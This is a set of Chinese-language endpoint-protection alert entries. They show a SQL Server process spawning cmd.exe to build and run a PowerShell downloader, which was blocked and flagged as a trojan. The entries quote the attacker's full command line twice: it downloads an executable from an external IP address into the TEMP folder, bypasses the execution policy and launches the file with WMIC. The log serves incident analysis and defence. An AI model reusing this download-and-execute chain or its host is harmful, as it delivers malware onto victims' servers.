|
|
cmd.exe触犯应用加固规则
1】2022-11-03 08:23:40,系统防护,系统加固,cmd.exe触犯敏感动作防护规则, 已阻止
防护项目:通过WMIC启动可疑进程
执行文件:C:\Windows\System32\wbem\WMIC.exe
执行命令行:WMIC process call create "C:\Windows\TEMP\ZE4O9H72.exe"
操作结果:已阻止
进程ID:6740
操作进程:C:\Windows\System32\cmd.exe
操作进程命令行:"C:\Windows\System32\cmd.exe" /C "echo $client = New-Object System.Net.WebClient > C:\Windows\TEMP\update.ps1 & echo $client.DownloadFile("http://80.66.75.25/arx1-Uchenmk.exe","C:\Windows\TEMP\ZE4O9H72.exe") >> C:\Windows\TEMP\update.ps1 & powershell -ExecutionPolicy Bypass C:\Windows\TEMP\update.ps1 & WMIC process call create "C:\Windows\TEMP\ZE4O9H72.exe""
操作进程校验和:0F3C4FF28F354AEDE202D54E9D1C5529A3BF87D8
父进程ID:1824
父进程:D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
父进程命令行:"D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【2】2022-11-03 08:23:24,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\wbem\WMIC.exe
操作目标参数:WMIC process call create "C:\Windows\TEMP\ZE4O9H72.exe"
操作结果:已阻止
保护进程路径:D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【3】2022-11-03 08:22:55,系统防护,系统加固,cmd.exe触犯敏感动作防护规则, 已阻止
防护项目:通过WMIC启动可疑进程
执行文件:C:\Windows\System32\wbem\WMIC.exe
执行命令行:WMIC process call create "C:\Windows\TEMP\U2QWE354.exe"
操作结果:已阻止
进程ID:8144
操作进程:C:\Windows\System32\cmd.exe
操作进程命令行:"C:\Windows\system32\cmd.exe" /c "echo $client = New-Object System.Net.WebClient > %TEMP%\update.ps1 & echo $client.DownloadFile("http://80.66.75.25/arx1-Uchenmk.exe","%TEMP%\U2QWE354.exe") >> %TEMP%\update.ps1 & powershell -ExecutionPolicy Bypass %temp%\update.ps1 & WMIC process call create "%TEMP%\U2QWE354.exe""
操作进程校验和:0F3C4FF28F354AEDE202D54E9D1C5529A3BF87D8
父进程ID:1824
父进程:D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
父进程命令行:"D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【4】2022-11-03 08:22:39,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\wbem\WMIC.exe
操作目标参数:WMIC process call create "C:\Windows\TEMP\U2QWE354.exe"
操作结果:已阻止
保护进程路径:D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【5】2022-11-03 08:21:54,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -ExecutionPolicy Bypass C:\Windows\TEMP\update.ps1
操作结果:已阻止
保护进程路径:D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【6】2022-11-03 08:21:11,病毒防护,文件实时监控,发现病毒HEUR:TrojanDownloader/PowerShell.Agent.a, 已处理
病毒名称:HEUR:TrojanDownloader/PowerShell.Agent.a
病毒ID:76CE49D5BC4CB654
病毒路径:C:\Windows\Temp\update.ps1
操作类型:执行
操作结果:已处理
进程ID:5828
操作进程:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作进程命令行:powershell -ExecutionPolicy Bypass C:\Windows\TEMP\update.ps1
父进程:C:\Windows\System32\cmd.exe
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
|
|
收藏
